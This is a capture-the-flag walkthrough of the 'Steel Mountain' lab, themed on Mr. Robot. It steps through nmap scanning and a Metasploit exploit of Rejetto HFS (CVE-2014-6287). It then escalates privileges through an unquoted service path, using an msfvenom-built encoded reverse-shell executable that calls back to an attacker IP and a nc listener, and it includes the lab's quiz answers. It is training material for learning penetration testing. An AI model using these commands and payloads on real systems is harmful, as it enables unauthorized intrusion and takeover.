Steel Mountain Walkthrough
INTRODUCTION:
So this Room called Steel Mountain is based on a series named as Mr. Robot,
The very First question in this Introduction part is:
What is the name of Employee of the month?
If we go to the page and click to download the image then we can see the name there, as we can see in the image below:
INITIAL ACCESS:
Now in this part or in any other machine,
Our First step is to run a nmap scan:
Command: nmap -T5 -p- -A <Target IP>
The we can see in the screenshots below:
Q2.1 Scan the machine with nmap. What is the other port running a web server on?
Ans2.1: 8080
Q2.2 Take a look at the other web server. What file server is running?
Ans2.2: Rejetto HTTP FILE SERVER
We can get this on the port 8080 of this machine:
If we click on this then we will redirected to it’s page.
Now we can check the CVE of HttpFileServer 2.3 on google and we will get the answer.
Q2.3 What is the CVE number to exploit this file server?
Ans2.3: 2014–6287
Now we will use Metasploit to get the initial access.
To open Metasploit then we can use the command: msfconsole
Now we can search for the exploit for HttpFileServer
We found an exploit for this:
We can use this by using,
Command: use 0
Now we will set the RPORT, RHOST, LHOST
Command: set RPORT 8080
set RHOST <Target IP>
set LHOST <Attacker IP>
Now after setting all these:
Run Command: Exploit
Now we will get the shell:
Now we can find the flag inside C:/Users/bill/Desktop
We got the user flag,
Now we have to escalate our Privilege to get the root flag.
PRIVILEGE ESCALATION:
Now we can use a script to Escalate Privilege.
PowerUp.ps1
We can upload this script on the machine using Metasploit using the command: upload <script Path>
Now we will run this script
Firstly the Command will be:
load powershell
powershell_shell
Now we will run the script,
Command: . .\PowerUp.ps1
The Result will look like this:
Here we will get the Answer of Our Questions:
Q3.2: Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
Ans3.2: AdvancedSystemCareService9
Now we will make a malicious application named as ASCService and replace it with the original one to get the reverse shell.
Firstly we have to popup a shell with using the
command: shell
Now we will stop the service with,
Command: sc stop AdvancedSystemCareService9
Now we will create a malicious application in our machine by using msfvenom.
Command: msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
Now we will upload this into our victim machine.
The process will be similar.
Now we will copy this application to the original path of ASCService.
Command: copy “C:\Users\bill\Desktop\ASCService.exe” “C:\Program Files (x86)\IObit\Advanced SystemCare\”
Now we will setup a listener to get the root access.
Commad: nc -nlvp 4443
Now we will start the service to get the root shell.
Command: sc start AdvancedSystemCareService9
After starting the Service,
We finally got the reverse shell through our listener:
Now we can get the root flag inside: C:\Users\Administrator\Desktop
